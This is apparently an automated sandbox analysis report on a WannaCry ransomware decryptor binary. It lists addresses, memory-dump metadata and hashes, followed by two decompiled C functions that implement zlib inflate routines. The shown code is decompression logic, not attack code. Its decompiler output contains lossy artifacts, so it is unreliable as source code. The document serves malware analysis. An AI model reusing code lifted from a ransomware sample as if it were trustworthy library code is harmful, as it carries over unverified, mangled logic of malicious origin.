                                  0x0040e2f3
                                  0x0040e2f5
                                  0x0040e2f9
                                  0x00000000
                                  0x0040e295
                                  0x0040e295
                                  0x0040e295
                                  0x0040e29b
                                  0x00000000
                                  0x00000000
                                  0x0040e2a1
                                  0x0040e2a3
                                  0x0040e2a4
                                  0x0040e2a7
                                  0x0040e2ab
                                  0x0040e2ad
                                  0x0040e2af
                                  0x0040e2b1
                                  0x0040e2b5
                                  0x0040e2b8
                                  0x0040e2c0
                                  0x0040e2c2
                                  0x0040e2c6
                                  0x0040e2c9
                                  0x0040e2cd
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e2cd
                                  0x0040e52e
                                  0x0040e532
                                  0x0040e535
                                  0x0040e541
                                  0x0040e54a
                                  0x0040e54c
                                  0x0040e54f
                                  0x0040e556
                                  0x0040e557
                                  0x0040e558
                                  0x0040e568
                                  0x0040e568
                                  0x00000000
                                  0x00000000
                                  0x0040e2ff
                                  0x0040e2ff
                                  0x0040e303
                                  0x0040e305
                                  0x0040e308
                                  0x0040e30d
                                  0x0040e311
                                  0x0040e313
                                  0x0040e316
                                  0x0040e318
                                  0x0040e31c
                                  0x0040e326
                                  0x0040e326
                                  0x0040e328
                                  0x0040e32d
                                  0x00000000
                                  0x00000000
                                  0x0040e322
                                  0x0040e322
                                  0x0040e32f
                                  0x0040e32f
                                  0x0040e333
                                  0x0040e337
                                  0x0040e33c
                                  0x0040e340
                                  0x0040e346
                                  0x0040e348
                                  0x00000000
                                  0x0040e34e
                                  0x0040e34e
                                  0x0040e353
                                  0x0040e357
                                  0x0040e378
                                  0x0040e378
                                  0x0040e37b
                                  0x0040e37f
                                  0x0040e380
                                  0x0040e381
                                  0x0040e382
                                  0x0040e387
                                  0x0040e38a
                                  0x0040e38e
                                  0x0040e391
                                  0x0040e396
                                  0x0040e39a
                                  0x0040e3a1
                                  0x0040e3a4
                                  0x0040e39c
                                  0x0040e39c
                                  0x0040e39e
                                  0x0040e39e
                                  0x0040e3a6
                                  0x0040e3a9
                                  0x0040e3af
                                  0x0040e3b3
                                  0x0040e3b5
                                  0x0040e3b8
                                  0x0040e3be
                                  0x0040e3d3
                                  0x0040e3c0
                                  0x0040e3c0
                                  0x0040e3c4
                                  0x0040e3cb
                                  0x0040e3cf
                                  0x0040e3c6
                                  0x0040e3c6
                                  0x0040e3c8
                                  0x0040e3c8
                                  0x0040e3c4
                                  0x0040e3be
                                  0x0040e3d9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e359
                                  0x0040e359
                                  0x0040e35c
                                  0x0040e361
                                  0x00000000
                                  0x0040e363
                                  0x0040e363
                                  0x0040e367
                                  0x0040e36e
                                  0x0040e372
                                  0x0040e369
                                  0x0040e369
                                  0x0040e36b
                                  0x0040e36b
                                  0x0040e376
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e376
                                  0x0040e361
                                  0x0040e357
                                  0x00000000
                                  0x0040e3df
                                  0x0040e3df
                                  0x0040e3e3
                                  0x0040e3e4
                                  0x0040e3ec
                                  0x0040e3ee
                                  0x0040e3f1
                                  0x0040e3f5
                                  0x0040e3f6
                                  0x0040e3fa
                                  0x0040e3fe
                                  0x0040e402
                                  0x0040e404
                                  0x0040e407
                                  0x0040e407
                                  0x0040e40b
                                  0x0040e40f
                                  0x0040e40f
                                  0x0040e40f
                                  0x0040e418
                                  0x00000000
                                  0x00000000
                                  0x0040e41f
                                  0x0040e4b6
                                  0x0040e4b6
                                  0x0040e4ba
                                  0x0040e4bb
                                  0x0040e4bc
                                  0x0040e4c4
                                  0x0040e4c7
                                  0x0040e4cb
                                  0x0040e4ce
                                  0x0040e4d2
                                  0x0040e4d2
                                  0x00000000
                                  0x0040e425
                                  0x0040e425
                                  0x0040e42a
                                  0x0040e42e
                                  0x0040e44f
                                  0x0040e44f
                                  0x0040e452
                                  0x0040e456
                                  0x0040e457
                                  0x0040e458
                                  0x0040e459
                                  0x0040e45e
                                  0x0040e461
                                  0x0040e465
                                  0x0040e468
                                  0x0040e46d
                                  0x0040e471
                                  0x0040e478
                                  0x0040e47b
                                  0x0040e473
                                  0x0040e473
                                  0x0040e475
                                  0x0040e475
                                  0x0040e47d
                                  0x0040e480
                                  0x0040e486
                                  0x0040e48a
                                  0x0040e48c
                                  0x0040e48f
                                  0x0040e495
                                  0x0040e4aa
                                  0x0040e497
                                  0x0040e497
                                  0x0040e49b
                                  0x0040e4a2
                                  0x0040e4a6
                                  0x0040e49d
                                  0x0040e49d
                                  0x0040e49f
                                  0x0040e49f
                                  0x0040e49b
                                  0x0040e495
                                  0x0040e4b0
                                  0x0040e5b2
                                  0x0040e5b2
                                  0x0040e5b6
                                  0x0040e5ba
                                  0x0040e5bd
                                  0x0040e5c0
                                  0x0040e5c2
                                  0x0040e5c4
                                  0x0040e5c7
                                  0x0040e5ca
                                  0x0040e5cc
                                  0x0040e5ce
                                  0x0040e5d0
                                  0x0040e5d3
                                  0x0040e5d7
                                  0x0040e5d8
                                  0x0040e5d9
                                  0x0040e5da
                                  0x0040e5dd
                                  0x0040e5e2
                                  0x0040e5ec
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e430
                                  0x0040e430
                                  0x0040e433
                                  0x0040e438
                                  0x00000000
                                  0x0040e43a
                                  0x0040e43a
                                  0x0040e43e
                                  0x0040e445
                                  0x0040e449
                                  0x0040e440
                                  0x0040e440
                                  0x0040e442
                                  0x0040e442
                                  0x0040e44d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e44d
                                  0x0040e438
                                  0x0040e42e
                                  0x00000000
                                  0x00000000
                                  0x0040e5f0
                                  0x0040e5f2
                                  0x0040e5f6
                                  0x0040e5f9
                                  0x0040e5fa
                                  0x0040e5fb
                                  0x0040e5fb
                                  0x0040e5ff
                                  0x0040e602
                                  0x0040e606
                                  0x0040e607
                                  0x0040e608
                                  0x0040e609
                                  0x0040e60e
                                  0x0040e611
                                  0x0040e614
                                  0x0040e619
                                  0x0040e652
                                  0x0040e656
                                  0x00000000
                                  0x0040e61b
                                  0x0040e61b
                                  0x0040e61f
                                  0x0040e622
                                  0x0040e625
                                  0x0040e629
                                  0x0040e62b
                                  0x0040e62e
                                  0x0040e630
                                  0x0040e631
                                  0x0040e636
                                  0x0040e638
                                  0x0040e639
                                  0x0040e63c
                                  0x0040e63e
                                  0x0040e63f
                                  0x0040e642
                                  0x0040e647
                                  0x0040e651
                                  0x0040e651
                                  0x00000000
                                  0x00000000
                                  0x0040e65c
                                  0x0040e65c
                                  0x0040e660
                                  0x0040e664
                                  0x0040e667
                                  0x0040e66a
                                  0x0040e66c
                                  0x0040e66e
                                  0x0040e671
                                  0x0040e674
                                  0x0040e676
                                  0x0040e678
                                  0x0040e67a
                                  0x0040e67b
                                  0x0040e67e
                                  0x0040e680
                                  0x0040e681
                                  0x0040e684
                                  0x0040e689
                                  0x0040e693
                                  0x00000000
                                  0x00000000
                                  0x0040e694
                                  0x0040e698
                                  0x0040e69c
                                  0x0040e69f
                                  0x0040e6a2
                                  0x0040e6a4
                                  0x0040e6a6
                                  0x0040e6a9
                                  0x0040e6ac
                                  0x0040e6ae
                                  0x0040e6b0
                                  0x0040e6b2
                                  0x0040e6b3
                                  0x0040e6b6
                                  0x0040e6b8
                                  0x0040e6b9
                                  0x0040e6bc
                                  0x0040e6c1
                                  0x0040e6cb
                                  0x00000000
                                  0x00000000
                                  0x0040e4d8
                                  0x0040e4dc
                                  0x0040e4de
                                  0x00000000
                                  0x0040df7c
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9b8eabf12bd29c3c38fc8e7bc8212d9d6bf0432072041c2816a53c5bd799d9a5
                                  • Instruction ID: e5ae74944e208cb03c60f72bb217c75502e03934b58f7a9b199ce6c2a9593854
                                  • Opcode Fuzzy Hash: 9b8eabf12bd29c3c38fc8e7bc8212d9d6bf0432072041c2816a53c5bd799d9a5
                                  • Instruction Fuzzy Hash: 5E2239B46083018FC308CF29D590A2ABBE1FF88354F148A6EE49AD7751D734E955CF5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E00410460(intOrPtr* _a4, signed int _a8) {
                                  				signed int* _t124;
                                  				signed int _t172;
                                  				signed int _t176;
                                  				signed int _t225;
                                  				intOrPtr* _t229;
                                  				signed int _t230;
                                  
                                  				_t229 = _a4;
                                  				if(_t229 == 0) {
                                  					L36:
                                  					return 0xfffffffe;
                                  				} else {
                                  					_t124 =  *(_t229 + 0x1c);
                                  					if(_t124 != 0 &&  *_t229 != 0) {
                                  						_t176 =  *_t124;
                                  						_t225 = 0xfffffffb;
                                  						_t172 = (0 | _a8 != 0x00000004) - 0x00000001 & 0xfffffffb;
                                  						_a8 = _t172;
                                  						if(_t176 <= 0xd) {
                                  							_t230 = 5;
                                  							do {
                                  								switch( *((intOrPtr*)(_t176 * 4 +  &M00410860))) {
                                  									case 0:
                                  										_t177 =  *((intOrPtr*)(_t229 + 4));
                                  										if(_t177 == 0) {
                                  											goto L39;
                                  										} else {
                                  											 *((intOrPtr*)(_t229 + 4)) = _t177 - 1;
                                  											_t225 = _t172;
                                  											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
                                  											_t124[1] = 0;
                                  											_t126 =  *(_t229 + 0x1c);
                                  											 *_t229 =  *_t229 + 1;
                                  											if((_t126[1] & 0x0000000f) == 8) {
                                  												if((_t126[1] >> 4) + 8 <= _t126[4]) {
                                  													 *_t126 = 1;
                                  													goto L12;
                                  												} else {
                                  													 *_t126 = 0xd;
                                  													 *(_t229 + 0x18) = "invalid window size";
                                  													goto L34;
                                  												}
                                  											} else {
                                  												 *_t126 = 0xd;
                                  												 *(_t229 + 0x18) = "unknown compression method";
                                  												goto L34;
                                  											}
                                  										}
                                  										goto L54;
                                  									case 1:
                                  										L12:
                                  										_t127 =  *((intOrPtr*)(_t229 + 4));
                                  										if(_t127 == 0) {
                                  											goto L39;
                                  										} else {
                                  											 *((intOrPtr*)(_t229 + 4)) = _t127 - 1;
                                  											_t225 = _t172;
                                  											_t173 =  *(_t229 + 0x1c);
                                  											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
                                  											_t131 =  *_t229;
                                  											_t188 =  *_t131;
                                  											 *_t229 = _t131 + 1;
                                  											if((_t173[1] << 8) % 0x1f == 0) {
                                  												if((_t188 & 0x00000020) != 0) {
                                  													_t174 = _a8;
                                  													 *( *(_t229 + 0x1c)) = 2;
                                  													goto L38;
                                  												} else {
                                  													 *_t173 = 7;
                                  													_t172 = _a8;
                                  													_t230 = 5;
                                  													goto L35;
                                  												}
                                  											} else {
                                  												 *_t173 = 0xd;
                                  												_t172 = _a8;
                                  												_t230 = 5;
                                  												 *(_t229 + 0x18) = "incorrect header check";
                                  												( *(_t229 + 0x1c))[1] = 5;
                                  												goto L35;
                                  											}
                                  										}
                                  										goto L54;
                                  									case 2:
                                  										L38:
                                  										_t138 =  *((intOrPtr*)(_t229 + 4));
                                  										if(_t138 != 0) {
                                  											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
                                  											 *((intOrPtr*)(_t229 + 4)) = _t138 - 1;
                                  											_t226 = _t174;
                                  											( *(_t229 + 0x1c))[2] = 0 << 0x18;
                                  											 *_t229 =  *_t229 + 1;
                                  											 *( *(_t229 + 0x1c)) = 3;
                                  											goto L41;
                                  										} else {
                                  											goto L39;
                                  										}
                                  										goto L54;
                                  									case 3:
                                  										L41:
                                  										_t143 =  *((intOrPtr*)(_t229 + 4));
                                  										if(_t143 != 0) {
                                  											 *((intOrPtr*)(_t229 + 4)) = _t143 - 1;
                                  											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
                                  											_t227 = _t174;
                                  											( *(_t229 + 0x1c))[2] = ( *(_t229 + 0x1c))[2] + (0 << 0x10);
                                  											 *_t229 =  *_t229 + 1;
                                  											 *( *(_t229 + 0x1c)) = 4;
                                  											goto L44;
                                  										} else {
                                  											return _t226;
                                  										}
                                  										goto L54;
                                  									case 4:
                                  										L44:
                                  										_t150 =  *((intOrPtr*)(_t229 + 4));
                                  										if(_t150 != 0) {
                                  											 *((intOrPtr*)(_t229 + 4)) = _t150 - 1;
                                  											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
                                  											_t228 = _t174;
                                  											( *(_t229 + 0x1c))[2] = ( *(_t229 + 0x1c))[2] + (0 << 8);
                                  											 *_t229 =  *_t229 + 1;
                                  											 *( *(_t229 + 0x1c)) = 5;
                                  											goto L47;
                                  										} else {
                                  											return _t227;
                                  										}
                                  										goto L54;
                                  									case 5:
                                  										L47:
                                  										_t158 =  *((intOrPtr*)(_t229 + 4));
                                  										if(_t158 != 0) {
                                  											 *((intOrPtr*)(_t229 + 4)) = _t158 - 1;
                                  											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
                                  											( *(_t229 + 0x1c))[2] = ( *(_t229 + 0x1c))[2];
                                  											 *_t229 =  *_t229 + 1;
                                  											_t163 =  *(_t229 + 0x1c);
                                  											 *(_t229 + 0x30) = _t163[2];
                                  											 *_t163 = 6;
                                  											return 2;
                                  										} else {
                                  											return _t228;
                                  										}
                                  										goto L54;
                                  									case 6:
                                  										 *(__esi[7]) = 0xd;
                                  										__eax = __esi[7];
                                  										__esi[6] = "need dictionary";
                                  										 *((intOrPtr*)(__esi[7] + 4)) = 0;
                                  										__eax = 0xfffffffe;
                                  										return 0xfffffffe;
                                  										goto L54;
                                  									case 7:
                                  										_push(__edi);
                                  										_push(__esi);
                                  										_push( *((intOrPtr*)(__eax + 0x14)));
                                  										__edi = E0040E840();
                                  										__esp = __esp + 0xc;
                                  										if(__edi != 0xfffffffd) {
                                  											if(__edi == 0) {
                                  												__edi = __ebx;
                                  											}
                                  											if(__edi != 1) {
                                  												goto L39;
                                  											} else {
                                  												__eax = __esi[7];
                                  												__edi = __ebx;
                                  												__eax = E0040E720( *((intOrPtr*)(__esi[7] + 0x14)), __esi, __esi[7] + 4);
                                  												__eax = __esi[7];
                                  												if( *((intOrPtr*)(__eax + 0xc)) == 0) {
                                  													 *__eax = 8;
                                  													goto L25;
                                  												} else {
                                  													 *__eax = 0xc;
                                  													goto L35;
                                  												}
                                  											}
                                  										} else {
                                  											 *(__esi[7]) = 0xd;
                                  											__eax = __esi[7];
                                  											 *((intOrPtr*)(__eax + 4)) = 0;
                                  											goto L35;
                                  										}
                                  										goto L54;
                                  									case 8:
                                  										L25:
                                  										__eax = __esi[1];
                                  										if(__eax == 0) {
                                  											goto L39;
                                  										} else {
                                  											__esi[1] = __eax;
                                  											__esi[2] = __esi[2] + 1;
                                  											__esi[2] = __esi[2] + 1;
                                  											__eax =  *__esi;
                                  											__edi = __ebx;
                                  											 *(__esi[7] + 8) = 0 << 0x18;
                                  											 *__esi =  *__esi + 1;
                                  											 *__esi =  *__esi + 1;
                                  											__eax = __esi[7];
                                  											 *(__esi[7]) = 9;
                                  											goto L27;
                                  										}
                                  										goto L54;
                                  									case 9:
                                  										L27:
                                  										__eax = __esi[1];
                                  										if(__eax == 0) {
                                  											goto L39;
                                  										} else {
                                  											__eax = __eax - 1;
                                  											__esi[2] = __esi[2] + 1;
                                  											__esi[1] = __eax;
                                  											__eax = __esi[7];
                                  											__edi = __ebx;
                                  											 *(__esi[7] + 8) =  *(__esi[7] + 8) + (0 << 0x10);
                                  											 *__esi =  *__esi + 1;
                                  											 *__esi =  *__esi + 1;
                                  											__eax = __esi[7];
                                  											 *(__esi[7]) = 0xa;
                                  											goto L29;
                                  										}
                                  										goto L54;
                                  									case 0xa:
                                  										L29:
                                  										__eax = __esi[1];
                                  										if(__eax == 0) {
                                  											goto L39;
                                  										} else {
                                  											__eax = __eax - 1;
                                  											__esi[2] = __esi[2] + 1;
                                  											__esi[1] = __eax;
                                  											__eax = __esi[7];
                                  											__edi = __ebx;
                                  											 *(__esi[7] + 8) =  *(__esi[7] + 8) + (0 << 8);
                                  											 *__esi =  *__esi + 1;
                                  											 *__esi =  *__esi + 1;
                                  											__eax = __esi[7];
                                  											 *(__esi[7]) = 0xb;
                                  											goto L31;
                                  										}
                                  										goto L54;
                                  									case 0xb:
                                  										L31:
                                  										__eax = __esi[1];
                                  										if(__eax == 0) {
                                  											L39:
                                  											return _t225;
                                  										} else {
                                  											__esi[1] = __eax;
                                  											__eax = __esi[7];
                                  											__esi[2] = __esi[2] + 1;
                                  											__edi = __ebx;
                                  											 *(__esi[7] + 8) =  *(__esi[7] + 8);
                                  											 *__esi =  *__esi + 1;
                                  											 *__esi =  *__esi + 1;
                                  											__eax = __esi[7];
                                  											if( *((intOrPtr*)(__eax + 4)) ==  *((intOrPtr*)(__eax + 8))) {
                                  												 *(__esi[7]) = 0xc;
                                  												goto L52;
                                  											} else {
                                  												 *__eax = 0xd;
                                  												__esi[6] = "incorrect data check";
                                  												L34:
                                  												( *(_t229 + 0x1c))[1] = _t230;
                                  												goto L35;
                                  											}
                                  										}
                                  										goto L54;
                                  									case 0xc:
                                  										L52:
                                  										__eax = 1;
                                  										return 1;
                                  										goto L54;
                                  									case 0xd:
                                  										__eax = 0xfffffffd;
                                  										return 0xfffffffd;
                                  										goto L54;
                                  								}
                                  								L35:
                                  								_t124 =  *(_t229 + 0x1c);
                                  								_t176 =  *_t124;
                                  							} while (_t176 <= 0xd);
                                  						}
                                  					}
                                  					goto L36;
                                  				}
                                  				L54:
                                  			}










                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5ba8141ea2280d0230f62837d297c6f142902cf6410748b00ceee70376d87497
                                  • Instruction ID: d75a74fb3a0dfdb81fbbcc262e1caa4e3a0368247a27923ffbf4d457c3a86cdc
                                  • Opcode Fuzzy Hash: 5ba8141ea2280d0230f62837d297c6f142902cf6410748b00ceee70376d87497
                                  • Instruction Fuzzy Hash: E4E105B5600A018FD334CF19D490A62FBF2EF89310B25C96ED4AACB761D775E886CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E0040FBC0() {
                                  				signed int _t153;
                                  				unsigned int _t155;
                                  				unsigned int _t161;
                                  				signed char _t173;
                                  				signed int _t176;
                                  				intOrPtr _t177;
                                  				signed int _t178;
                                  				signed char _t180;
                                  				signed int _t181;
                                  				intOrPtr _t182;
                                  				intOrPtr _t193;
                                  				signed int _t200;
                                  				intOrPtr _t201;
                                  				signed int _t204;
                                  				signed int _t212;
                                  				signed int _t219;
                                  				signed int _t235;
                                  				signed int _t240;
                                  				void* _t241;
                                  				void* _t242;
                                  				void* _t243;
                                  				intOrPtr* _t249;
                                  				signed int _t252;
                                  				signed int _t261;
                                  				signed int _t267;
                                  				unsigned int _t270;
                                  				unsigned int _t273;
                                  				char* _t279;
                                  				char* _t280;
                                  				char* _t281;
                                  				char* _t282;
                                  				char* _t283;
                                  				intOrPtr _t284;
                                  				intOrPtr _t285;
                                  				void* _t286;
                                  				intOrPtr* _t287;
                                  				signed int _t289;
                                  				intOrPtr _t290;
                                  				void* _t291;
                                  				intOrPtr* _t295;
                                  				intOrPtr* _t297;
                                  				intOrPtr* _t299;
                                  				intOrPtr* _t301;
                                  				signed int _t305;
                                  				signed int _t309;
                                  				intOrPtr* _t313;
                                  				intOrPtr _t317;
                                  				void* _t320;
                                  				intOrPtr _t321;
                                  				signed int _t323;
                                  				intOrPtr _t325;
                                  				intOrPtr _t326;
                                  				signed int _t327;
                                  				void* _t328;
                                  				void* _t330;
                                  				void* _t331;
                                  
                                  				_t153 =  *(_t331 + 0x2c);
                                  				_t204 =  *(_t331 + 0x28);
                                  				_t316 =  *_t153;
                                  				_t270 =  *(_t204 + 0x20);
                                  				_t284 =  *((intOrPtr*)(_t204 + 0x30));
                                  				_t279 =  *((intOrPtr*)(_t204 + 0x34));
                                  				 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t153 + 4));
                                  				_t155 =  *(_t204 + 0x1c);
                                  				 *((intOrPtr*)(_t331 + 0x18)) = _t316;
                                  				if(_t279 >= _t284) {
                                  					 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t204 + 0x2c)) - _t279;
                                  				} else {
                                  					 *((intOrPtr*)(_t331 + 0x14)) = _t284 - _t279 - 1;
                                  				}
                                  				 *(_t331 + 0x1c) =  *(0x41a260 +  *(_t331 + 0x28) * 4);
                                  				 *(_t331 + 0x20) =  *(0x41a260 +  *(_t331 + 0x2c) * 4);
                                  				L4:
                                  				while(1) {
                                  					if(_t155 < 0x14) {
                                  						do {
                                  							 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
                                  							_t289 = 0 << _t155;
                                  							_t155 = _t155 + 8;
                                  							_t270 = _t270 | _t289;
                                  							_t316 = _t316 + 1;
                                  						} while (_t155 < 0x14);
                                  						 *((intOrPtr*)(_t331 + 0x18)) = _t316;
                                  					}
                                  					_t285 =  *((intOrPtr*)(_t331 + 0x30));
                                  					_t212 =  *(_t331 + 0x1c) & _t270;
                                  					_t173 =  *((intOrPtr*)(_t285 + _t212 * 8));
                                  					_t286 = _t285 + _t212 * 8;
                                  					if(0 == 0) {
                                  						L35:
                                  						_t270 = _t270 >>  *(_t286 + 1);
                                  						_t155 = _t155;
                                  						 *_t279 =  *((intOrPtr*)(_t286 + 4));
                                  						_t279 = _t279 + 1;
                                  						 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t331 + 0x14)) - 1;
                                  						goto L36;
                                  					} else {
                                  						_t270 = _t270 >>  *(_t286 + 1);
                                  						_t155 = _t155;
                                  						 *(_t331 + 0x28) = 0;
                                  						if((_t173 & 0x00000010) != 0) {
                                  							L12:
                                  							_t178 = _t173 & 0x0000000f;
                                  							_t161 = _t155 - _t178;
                                  							 *(_t331 + 0x2c) = ( *(0x41a260 + _t178 * 4) & _t270) +  *((intOrPtr*)(_t286 + 4));
                                  							_t273 = _t270 >> _t178;
                                  							if(_t161 < 0xf) {
                                  								do {
                                  									 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
                                  									_t309 = 0 << _t161;
                                  									_t161 = _t161 + 8;
                                  									_t273 = _t273 | _t309;
                                  									_t316 = _t316 + 1;
                                  								} while (_t161 < 0xf);
                                  								 *((intOrPtr*)(_t331 + 0x18)) = _t316;
                                  							}
                                  							_t290 =  *((intOrPtr*)(_t331 + 0x34));
                                  							_t235 =  *(_t331 + 0x20) & _t273;
                                  							_t180 =  *((intOrPtr*)(_t290 + _t235 * 8));
                                  							_t291 = _t290 + _t235 * 8;
                                  							_t270 = _t273 >>  *(_t291 + 1);
                                  							_t155 = _t161;
                                  							 *(_t331 + 0x28) = 0;
                                  							if((_t180 & 0x00000010) != 0) {
                                  								L18:
                                  								_t181 = _t180 & 0x0000000f;
                                  								while(_t155 < _t181) {
                                  									 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
                                  									_t323 = 0 << _t155;
                                  									_t155 = _t155 + 8;
                                  									_t270 = _t270 | _t323;
                                  									_t316 =  *((intOrPtr*)(_t331 + 0x18)) + 1;
                                  									 *((intOrPtr*)(_t331 + 0x18)) =  *((intOrPtr*)(_t331 + 0x18)) + 1;
                                  								}
                                  								_t320 = ( *(0x41a260 + _t181 * 4) & _t270) +  *((intOrPtr*)(_t291 + 4));
                                  								_t270 = _t270 >> _t181;
                                  								_t240 =  *(_t331 + 0x2c);
                                  								_t155 = _t155 - _t181;
                                  								 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t331 + 0x14)) - _t240;
                                  								_t295 = _t279 - _t320;
                                  								_t321 =  *((intOrPtr*)(_t331 + 0x38));
                                  								_t182 =  *((intOrPtr*)(_t321 + 0x28));
                                  								if(_t295 >= _t182) {
                                  									 *_t279 =  *_t295;
                                  									_t280 = _t279 + 1;
                                  									 *_t280 =  *((intOrPtr*)(_t295 + 1));
                                  									_t281 = _t280 + 1;
                                  									_t297 = _t295 + 2;
                                  									_t241 = _t240 - 2;
                                  									do {
                                  										 *_t281 =  *_t297;
                                  										_t281 = _t281 + 1;
                                  										_t297 = _t297 + 1;
                                  										_t241 = _t241 - 1;
                                  									} while (_t241 != 0);
                                  									_t316 =  *((intOrPtr*)(_t331 + 0x18));
                                  								} else {
                                  									_t327 =  *(_t321 + 0x2c);
                                  									 *(_t331 + 0x28) = _t327;
                                  									_t328 = _t327 - _t182;
                                  									do {
                                  										_t295 = _t295 + _t328;
                                  									} while (_t295 < _t182);
                                  									_t330 =  *(_t331 + 0x28) - _t295;
                                  									if(_t240 <= _t330) {
                                  										 *_t279 =  *_t295;
                                  										_t282 = _t279 + 1;
                                  										 *_t282 =  *((intOrPtr*)(_t295 + 1));
                                  										_t283 = _t282 + 1;
                                  										_t299 = _t295 + 2;
                                  										_t242 = _t240 - 2;
                                  										do {
                                  											 *_t283 =  *_t299;
                                  											_t283 = _t283 + 1;
                                  											_t299 = _t299 + 1;
                                  											_t242 = _t242 - 1;
                                  										} while (_t242 != 0);
                                  										_t316 =  *((intOrPtr*)(_t331 + 0x18));
                                  									} else {
                                  										_t243 = _t240 - _t330;
                                  										do {
                                  											 *_t279 =  *_t295;
                                  											_t279 = _t279 + 1;
                                  											_t295 = _t295 + 1;
                                  											_t330 = _t330 - 1;
                                  										} while (_t330 != 0);
                                  										_t301 =  *((intOrPtr*)( *((intOrPtr*)(_t331 + 0x38)) + 0x28));
                                  										do {
                                  											 *_t279 =  *_t301;
                                  											_t279 = _t279 + 1;
                                  											_t301 = _t301 + 1;
                                  											_t243 = _t243 - 1;
                                  										} while (_t243 != 0);
                                  										_t316 =  *((intOrPtr*)(_t331 + 0x18));
                                  									}
                                  								}
                                  								L36:
                                  								if( *((intOrPtr*)(_t331 + 0x14)) < 0x102 ||  *((intOrPtr*)(_t331 + 0x10)) < 0xa) {
                                  									_t287 =  *((intOrPtr*)(_t331 + 0x3c));
                                  									_t219 =  *((intOrPtr*)(_t287 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
                                  									_t176 = _t155 >> 3;
                                  									if(_t176 < _t219) {
                                  										_t219 = _t176;
                                  									}
                                  									_t177 =  *((intOrPtr*)(_t331 + 0x38));
                                  									_t317 = _t316 - _t219;
                                  									 *(_t177 + 0x20) = _t270;
                                  									 *((intOrPtr*)(_t177 + 0x1c)) = _t155 - _t219 * 8;
                                  									 *((intOrPtr*)(_t287 + 4)) = _t219 +  *((intOrPtr*)(_t331 + 0x10));
                                  									 *_t287 = _t317;
                                  									 *((intOrPtr*)(_t287 + 8)) =  *((intOrPtr*)(_t287 + 8)) + _t317 -  *_t287;
                                  									 *((intOrPtr*)(_t177 + 0x34)) = _t279;
                                  									return 0;
                                  								} else {
                                  									continue;
                                  								}
                                  							} else {
                                  								while((_t180 & 0x00000040) == 0) {
                                  									_t252 = ( *(0x41a260 + _t180 * 4) & _t270) +  *((intOrPtr*)(_t291 + 4));
                                  									_t180 =  *((intOrPtr*)(_t291 + _t252 * 8));
                                  									_t291 = _t291 + _t252 * 8;
                                  									_t270 = _t270 >>  *(_t291 + 1);
                                  									_t155 = _t155;
                                  									 *(_t331 + 0x28) = 0;
                                  									if((_t180 & 0x00000010) == 0) {
                                  										continue;
                                  									} else {
                                  										goto L18;
                                  									}
                                  									goto L51;
                                  								}
                                  								_t249 =  *((intOrPtr*)(_t331 + 0x3c));
                                  								 *(_t249 + 0x18) = "invalid distance code";
                                  								 *(_t331 + 0x2c) =  *((intOrPtr*)(_t249 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
                                  								_t305 = _t155 >> 3;
                                  								if(_t305 >=  *(_t331 + 0x2c)) {
                                  									goto L49;
                                  								}
                                  								goto L50;
                                  							}
                                  						} else {
